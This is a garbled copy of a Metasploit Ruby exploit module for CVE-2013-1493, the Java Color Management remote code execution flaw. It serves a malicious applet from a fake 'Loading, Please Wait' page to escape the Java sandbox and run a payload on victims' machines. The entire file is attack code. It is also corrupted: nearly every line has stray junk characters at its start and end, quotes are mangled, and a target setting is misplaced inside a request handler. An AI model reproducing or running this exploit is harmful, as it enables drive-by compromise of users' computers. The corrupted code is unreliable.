##! F- e# I# O' {
7 G3 z9 ^- u. o2 g# P H! y$ v
# This file is part of the Metasploit Framework and may be subject to# j- ^) g0 ]# q2 l9 F1 h0 S4 P; ?
# redistribution and commercial restrictions. Please see the Metasploit0 @8 w- x3 {$ h: A* E: m! S! W
# web site for more information on licensing and terms of use.9 ~5 j" D' i9 N
# http://metasploit.com/; i& W1 {( q! k5 [
##
& g" X! q- Z4 I0 Irequire ‘msf/core’& } P1 A" }! D7 C& T# G- D" A6 ^
require ‘rex’
- U5 x! r6 T0 z' ]1 k5 O# }class Metasploit3 < Msf::Exploit::Remote
* [5 D7 W1 x. C8 x7 w* a2 G! wRank = NormalRanking- K4 y0 g+ ]# x2 l1 o* ?
include Msf::Exploit::Remote::HttpServer::HTML5 Y" @# }+ \* j
include Msf::Exploit::EXE
! T+ @3 j/ F6 P6 }: p4 M# r4 qinclude Msf::Exploit::Remote::BrowserAutopwn
/ Z% ^# X' Y4 c+ E& f+ kautopwn_info({ :javascript => false })
7 W0 }! z, U& {* N" Q6 w1 G; Q7 ^def initialize( info = {} )) W4 _$ ]+ R' C' E/ m
super( update_info( info,
0 z* Q4 L( P+ i2 }2 m1 V1 `" E( h‘Name’ => ‘Java CMM Remote Code Execution’,& K* N6 Q; P1 W% V3 ~
‘Description’ => %q{
2 E+ v/ E) [2 k' r/ R. n" mThis module abuses the Color Management classes from a Java Applet to run
! u: y; R( p) P: f9 N0 ^* Darbitrary Java code outside of the sandbox as exploited in the wild in February
( X) R( t7 D3 K, T# K, ~! Tand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u416 D9 r2 Q! z0 u! @1 ^$ N$ b3 \, `6 J
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
% [) E$ y3 r- ^' ssystems. This exploit doesn’t bypass click-to-play, so the user must accept the java2 ?' @. W0 R d% H# i
warning in order to run the malicious applet.* Y% R, y7 B" @! h
},
r1 m. X: x6 d4 g) ?9 Q, H* }6 t‘License’ => MSF_LICENSE,
; b3 i M+ N8 m2 t$ G3 D9 i‘Author’ =>& S7 q* s. R3 j5 `5 Y8 N7 e6 c
'Unknown', # Vulnerability discovery and Exploit& r8 s9 e; T. |5 b
'juan vazquez' # Metasploit module (just ported the published exploit)
K2 U4 C7 E" [: |* A( S2 i],
p3 O# A+ g: m6 g+ R‘References’ =>
& h& S! P. u G7 X2 z9 K$ s6 R; q[% C* b' z4 m3 ]0 q3 R8 F( R6 j/ Y
[ 'CVE', '2013-1493' ],
- A+ c' e- Z# H) A$ A[ 'OSVDB', '90737' ],; z, H- F! D: b! T9 Q' `
[ 'BID', '58238' ],
- ^/ e( U5 V4 @[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
$ o" v% @; ^( d. Q8 `, W[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],. {' f! E3 H9 Z/ ?2 K$ v& O N0 S
[ 'URL', 'http://pastie.org/pastes/6581034' ]: J: s9 ]7 e; P$ N/ b% g
],- F! A7 C ^. s5 i: l+ H
‘Platform’ => [ 'win', 'java' ],
7 |) G2 I/ M& z1 q& X5 A‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
* {# [% z( c! p' D5 j9 B2 w‘Targets’ =>
4 Q) l2 Z" s, h$ g/ ^& y( S[ r- b/ k# o( @5 U* U/ q! L
[ 'Generic (Java Payload)',
7 ]; H: K# X' g! y( e{5 L, a7 m+ Z/ J# K
'Platform' => 'java',
$ B+ {+ G# s: w M2 y9 ]'Arch' => ARCH_JAVA5 x; D$ C; p- M: E$ ^6 x9 M5 t
}
( y, M/ N5 N1 [9 ~. b- r],: T8 j$ `) T! B/ [% V5 X
[ 'Windows x86 (Native Payload)',( x( @3 V. A- O
{
( m: ^/ w/ B$ Z1 b'Platform' => 'win',% }* E! f% ~7 X, F! V* C
'Arch' => ARCH_X86
6 `1 i+ O/ D$ w6 I+ z) O/ a}# O# [) L, O% l3 c- ]4 f
]
8 R$ m4 T3 F' r8 w$ I. y4 x' T+ j5 H. I],7 e3 \& M/ f- I, u; \& X" e
‘‘DisclosureDate’ => ‘Mar 01 2013′
% a; h* `4 F1 e: g5 [ p))
: @1 G) \1 W! Zend
f# o" c( V9 {! \$ w# `def setup( |; Z4 r) V8 l) ?$ O# q
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
& G+ K+ a9 K6 l2 y% i0 W/ a@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }% j; j: `, {* k9 n
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
# V" `7 _2 @ ?" Q@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
1 E" B I) W3 N$ Wpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
8 M0 n4 Y' `1 S# l@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
2 c2 q8 y$ P3 z3 B) T% Spath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)0 f- W# E' h c. r% {4 t
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
: e& u1 o- `% V N& U) x@init_class_name = rand_text_alpha(“Init”.length)
$ M2 S3 \% J* W1 M0 K b@init_class.gsub!(“Init”, @init_class_name)
/ R* z" m$ s5 psuper0 |8 i2 @, X# n$ a( R
end
0 i' z9 W, B8 m. n( _1 U/ Zdef on_request_uri(cli, request)
5 y Q5 W% z: H# E9 yprint_status(“handling request for #{request.uri}”)1 Y: ^+ T: K6 K. R5 @2 Z' S9 T
case request.uri
8 q8 W' q3 K5 a: E* Swhen /\.jar$/i( y3 l' r% n9 E/ N
jar = payload.encoded_jar, j/ e0 h) _3 {+ v; t5 b
jar.add_file(“#{@init_class_name}.class”, @init_class)4 o# @' B! r% H/ O
jar.add_file(“Leak.class”, @leak_class)
( O, h- Y0 o j0 Y3 i# Ijar.add_file(“MyBufferedImage.class”, @buffered_image_class)- E1 t9 r# Q; q, i& U% h' O
jar.add_file(“MyColorSpace.class”, @color_space_class)
/ F2 A5 l4 q) I& w1 A* z" TDefaultTarget’ => 1,3 A+ l! S" }2 d" Y- }
metasploit_str = rand_text_alpha(“metasploit”.length)
+ H$ P+ w4 }5 _1 {; i6 d* I, ]. Ppayload_str = rand_text_alpha(“payload”.length)- f0 ^8 }1 Q+ l4 R( X9 V
jar.entries.each { |entry|
8 P( k; Z- r( _# _5 m- H3 t0 S. \entry.name.gsub!(“metasploit”, metasploit_str)
) C" f2 U0 U: z0 j. Z3 D+ eentry.name.gsub!(“Payload”, payload_str)
d. k- r$ p0 T# d& Oentry.data = entry.data.gsub(“metasploit”, metasploit_str)
' V8 Z6 [2 }8 y: o+ D0 lentry.data = entry.data.gsub(“Payload”, payload_str), N; b3 B& ^ Z' {/ R7 ~; w, W
}3 @. k5 }8 t# l R& C6 @) |
jar.build_manifest4 z/ \' j/ k' M
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })6 N( [7 L! }1 j5 S( a8 p+ q
when /\/$/
2 E! D& ?# {# v m9 L8 G+ F& v9 opayload = regenerate_payload(cli)
9 X8 S! @, e$ E& d, z9 N# |if not payload
3 _" r/ ^+ k% `2 w1 tprint_error(“Failed to generate the payload.”)
4 h5 f: o2 O& c! G6 rsend_not_found(cli)8 l( y5 G P% g0 L
return
, G! p0 Y% h/ z. i- O9 `7 _end# g4 C. x7 H! [* b, P; ~
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })0 u% f. T# ]* N8 F _' d( D$ O
else+ b- D; t9 \9 i& i% p- e' c0 r
send_redirect(cli, get_resource() + ‘/’, ”)* R s/ ~2 c& [1 c% k7 T
end9 ~4 L1 \3 a3 P5 O
end
$ ~. G4 B6 Q# W; F/ I Rdef generate_html
3 }/ w3 c1 s* Bhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|" J3 B4 ^7 V o
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
5 p; G8 r3 E; ^; X9 Shtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|7 y* D9 I# k! w; w$ ?8 j. B
html += %Q|</applet></body></html>|
( E: F; g8 r* x* @return html5 h) S+ ^' G: @9 w9 r
end* k: [0 m9 {1 t6 S7 U( `2 B% g
end
/ p/ o& @6 l* V7 S6 B6 X% V% rend; t, }6 `4 o8 Y# F4 f, K/ d
|